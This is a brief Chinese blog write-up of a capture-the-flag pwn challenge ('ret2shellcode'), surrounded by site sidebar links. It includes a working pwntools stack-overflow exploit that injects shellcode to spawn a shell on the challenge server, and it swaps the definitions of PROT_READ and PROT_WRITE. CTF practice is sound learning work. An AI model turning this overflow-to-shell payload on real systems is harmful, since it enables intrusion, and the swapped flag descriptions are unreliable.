[HNCTF 2022 Week1]ret2shellcode

已于 2023-12-11 17:59:40 修改
阅读量172 收藏
点赞数 3
分类专栏: PWN 文章标签: 前端 linux 数据库
于 2023-12-11 17:59:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76466003/article/details/134933034
版权

一道shellcode的题

file 和checksec

NX不可执行保护开启

但是有个memset(s, 0, sizeof(s));函数

mprotect()函数把自start开始的、长度为len的内存区的保护属性修改为prot指定的值。

prot可以取以下几个值,并且可以用“|”将几个属性合起来使用:

1)PROT_READ:表示内存段内的内容可写;

2)PROT_WRITE:表示内存段内的内容可读;

3)PROT_EXEC:表示内存段中的内容可执行;

4)PROT_NONE:表示内存段中的内容根本没法访问。

代表着buff可以执行了

也可以用GDB调试去看一下

exp

from ast import Interactive
from pwn import *
context.os = 'linux'
context.arch = 'amd64'
context.log_level = 'debug'
i= remote('node5.anna.nssctf.cn',28148)
buu_add = 0x4040a0
shellcode = asm(shellcraft.sh())
payload = shellcode.ljust(0x100+8,b'a')+p64(buu_add)
i.sendline(payload)
i.interactive()

先指定context.arch="i386/amd64"
asm(自定义shellcode)
asm(shellcraft.sh())

自动生成shellcode

就这么多吧,不想写了今天,有空再补

沈理大学牲
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn07.ret2syscall例题
11-11
ret2syscall例题
ret2libc1pwn 入门题
02-11
pwn 入门题
【PWN · ret2shellcode】[HNCTF 2022 Week1]ret2shellcode
Mr_Fmnwon的博客
04-25 2650
ret2shellcode——顾名思义,控制执行流到shellcode在更简单的一类题目ret2text中,我们主要的尝试是修改某个返回地址修改,修改到程序固有的后门函数处,劫持程序控制流以期返回后门。然而,如果程序中并不存在这样的后门函数,那么很朴素的想法是,能不能自己写一段后门函数,然后劫持程序控制流返回执行这段恶意代码呢?依此,主要的过程如下:(1)构造shellcode通过溢出放到程序某片存储空间上——为了能够执行这段代码,所存储的区域需要有可执行的权限。
[HNCTF 2022 Week1] PWN 复现
Xzzzz911的博客
08-18 1438
至于payload的构造格式,就要了解64位程序的传参方式,前六个参数是通过rdi, rsi, rdx, rcx, r8, r9, 这六个寄存器,后续的参数通过栈传递,记住格式就行。首先分析一下代码,可知出现了两个buf,但是这两个buf的作用是不同的,第一个buf在bss段,这样就可以把binsh写进buf里面,然后执行system(binsh)获得flag。签到题,直接nc就行,但是这里有坑需要注意下,直接cat flag,得到的是一个假的flag,真的flag分为两部分,这点需要注意下。
【Pwn】Rop-Ret2Shellcode-32位
weixin_52553215的博客
05-24 713
ret2text漏洞依赖于程序中存在system(“/bin/sh”)的函数 若没有此函数,可以传入自定义shellcode //shellcode是黑客编写的用于实行特定功能的汇编代码,例如:execve(“/bin/sh”,null,null); Ret2Shellcode条件:1.无执行shell的函数 2.没有开启NX保护 Ret2libc条件:1.开启NX 2.使用li...
hnctf-pwn-[week1]
m0_64174759的博客
11-20 1589
hnctf pwn week1 WP,栈溢出,格式化字符串,32位,64位rop,ret2shellcode,可见字符串,格式化字符串
栈溢出 shellcode ret2shellcode
wing_7的博客
10-06 494
shellcode_address = buf_address+0x20 # buf与rbp的距离0x10 + rbp的宽度0x8 + 返回地址的长度0x8。rbp用来存储当前函数状态的基地址,在函数运行时不变,用来索引确定函数的参数或局部变量的位置。将函数的返回地址覆写为我们构造的shell的地址,这样就可以达到获取shell的目的了。将函数的返回地址覆写为我们构造的shell的地址,这样就可以达到获取shell的目的了。栈空间增长方式是从高地址到地址的,也就是栈顶的地址值是小于栈底的地址值的。
2022HNCTF-re部分题解
weixin_61154173的博客
12-04 1187
2022HNCTF-re部分
NSSCTF Pwn Page 1 - 2
红叶的博客
03-14 1596
NSSCTF Pwn 第一页到第二页全部题目解析。 刷了大概一个月的NSSCTF,对Pwn的理解更高了,虽然也没高到哪去。
pwn学习笔记(2)ret_2_text_or_shellcode
qq_66013948的博客
02-04 1235
​ ax寄存器:通用寄存器,可用于存放多种数据​ bp寄存器:存放的是栈帧的栈底地址​ sp寄存器:存放的是栈顶的地址​ 栈帧是存储函数的一些信息的地方,栈帧存储有函数的局部变量,传递给子函数的实际参数,父函数的地址以及上一个栈帧栈底的地址,大致情况如下:​ 在函数调用的过程中,首先会讲bp寄存器的值进行压栈,以方便在恢复的时候恢复栈底寄存器的值,再之后,会按顺序将局部变量压栈,最后是子函数的实际参数,会按照先入栈的后出栈,从最后一个实际参数先入栈再到第一个实际参数,比如函数a(int a ,
NSSCTF PWN方向刷题记录
CyhStyrl的博客
04-03 620
流程:先添加note 0 再删除note 0 再添加note 1 并修改note1 内容为payload note1所在地址空间实则为note 0 所在位置(free后指针没有置为null 存在UAF漏洞)
ret2dl_resolve解析1
08-08
//一些关于导入符号的信息,我们只关心从第二个字节开始的值((val)>>8),忽略那个07 //1和3是这个导入函数的符号在.dynsym中的下标, //如果
2022年汇编语言程序设计2.ppt
11-03
1. 定位伪指令:ORG n,n为十进制或十六进制常数,规定了后面指令的地址。 2. 汇编结束伪指令:END,当汇编程序遇到该指令后,结束汇编过程。 3. 定义字节伪指令:DB x1,x2,…,xn,其中Xi为8位数据或ASCII码。 4. ...
Performing a ret2libc Attack-InVoLuNTaRy
04-24
ret2libc
JS中一个dom元素能绑定多少事件
ggq53219的博客
06-10 638
在JavaScript中,一个DOM元素可以绑定的事件数量并没有明确的限制,这主要取决于浏览器的实现和内存限制。然而,在实际应用中,为同一个DOM元素绑定过多的事件监听器可能会导致性能问题,尤其是在事件处理函数执行复杂操作的情况下。总之,虽然JavaScript中DOM元素可以绑定的事件数量没有明确的限制,但在实际应用中应注意避免过度绑定和优化事件处理函数,以确保良好的性能和用户体验。
Web前端网站设计案例:深入剖析创意与技术的完美融合
liyrbtqe_66w的博客
06-12 352
在性能优化方面,设计师通过压缩代码、减少HTTP请求、使用CDN等技术手段,提升了网站的加载速度和响应性能,为用户提供了更加流畅的访问体验。综上所述,本Web前端网站设计案例通过视觉设计、用户体验、技术实现、性能优化、创意表达、响应式设计和跨平台兼容等方面的综合考量,成功打造了一款既美观又实用的网站。这个案例充分展示了Web前端设计的魅力和潜力,为未来的网站设计提供了有益的借鉴和启示。设计师通过独特的视觉元素和创意构思,将品牌理念和文化内涵融入其中,使得整个网站在传达信息的同时,也展现出品牌的独特魅力。
HTML入门教程:深度解析HTML,开启你的前端技术之旅
最新发布
zhangwenok的博客
06-14 1377
HTML(HyperText Markup Language,超文本标记语言)是前端开发的基础,它负责构建网页的结构和内容。作为前端技术栈的基石,HTML的掌握程度直接影响到网页的开发效率和用户体验。本教程将带你从零开始,逐步深入了解HTML的各个方面,帮助你打下坚实的前端技术基础。HTML是一种用于创建网页的标准标记语言,它通过一系列的元素(elements)和标签(tags)来定义网页的结构和内容。HTML文档由一系列的元素组成,这些元素通过标签来标识。
Web前端设计大赛:创意与技术的碰撞
huejiaqwerty888的博客
06-12 455
在这场竞赛中,参赛者们不仅需要展现出独特的创意,还需要运用精湛的技术将创意转化为实际作品。本文将从四个方面、五个方面、六个方面和七个方面,深入剖析Web前端设计大赛的魅力和挑战。交互设计是Web前端设计的核心环节。参赛者需要关注页面的加载速度、响应速度以及操作的便捷性等方面,确保用户在使用过程中能够获得良好的体验。参赛者需要敢于突破传统的设计理念和技术限制,尝试新的设计手法和技术应用。参赛者需要在创意构思、视觉呈现、交互设计、用户体验、技术实现、性能优化以及创新性和可实践性等方面进行全面考虑和精心打造。
ret2shellcode
03-17
ret2shellcode 是一种攻击技术,通常用于在计算机系统中绕过安全防护机制,执行恶意操作。这种技术通过利用程序中的缓冲区溢出漏洞,在返回到函数的返回地址处插入恶意代码,来达到控制程序流程并执行恶意操作的目的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值